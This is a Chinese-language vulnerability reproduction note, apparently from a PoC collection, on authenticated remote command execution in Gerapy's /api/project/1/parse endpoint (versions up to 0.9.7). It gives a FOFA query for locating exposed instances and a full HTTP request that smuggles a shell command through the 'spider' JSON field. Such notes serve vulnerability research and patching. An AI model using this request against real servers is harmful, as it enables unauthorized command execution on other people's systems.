2022-05-24 17:29:00 +08:00
|
|
|
# Gerapy parse 后台远程命令执行漏洞
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
|
|
|
|
|
Gerapy gerapy/server/core/views.py 中的方法存在任意命令执行,攻击者登录后台后发送特定的请求包即可利用漏洞
|
|
|
|
|
|
|
|
|
|
## 漏洞影响
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
Gerapy <= 0.9.7
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## FOFA
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
title="Gerapy"
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
|
|
|
|
|
登录页面
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|

|
2022-05-24 17:29:00 +08:00
|
|
|
|
|
|
|
|
出现漏洞的文件为 `gerapy/server/core/views.py`
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|

|
2022-05-24 17:29:00 +08:00
|
|
|
|
|
|
|
|
构造请求包测试命令执行
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
POST /api/project/1/parse HTTP/1.1
|
|
|
|
|
Host:
|
|
|
|
|
Pragma: no-cache
|
|
|
|
|
Cache-Control: no-cache
|
|
|
|
|
Accept: application/json, text/plain, */*
|
|
|
|
|
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
|
|
|
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
|
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
|
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
|
|
|
|
|
Content-Length: 18
|
|
|
|
|
|
|
|
|
|
{"spider":";`id`"}
|
|
|
|
|
```
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|

|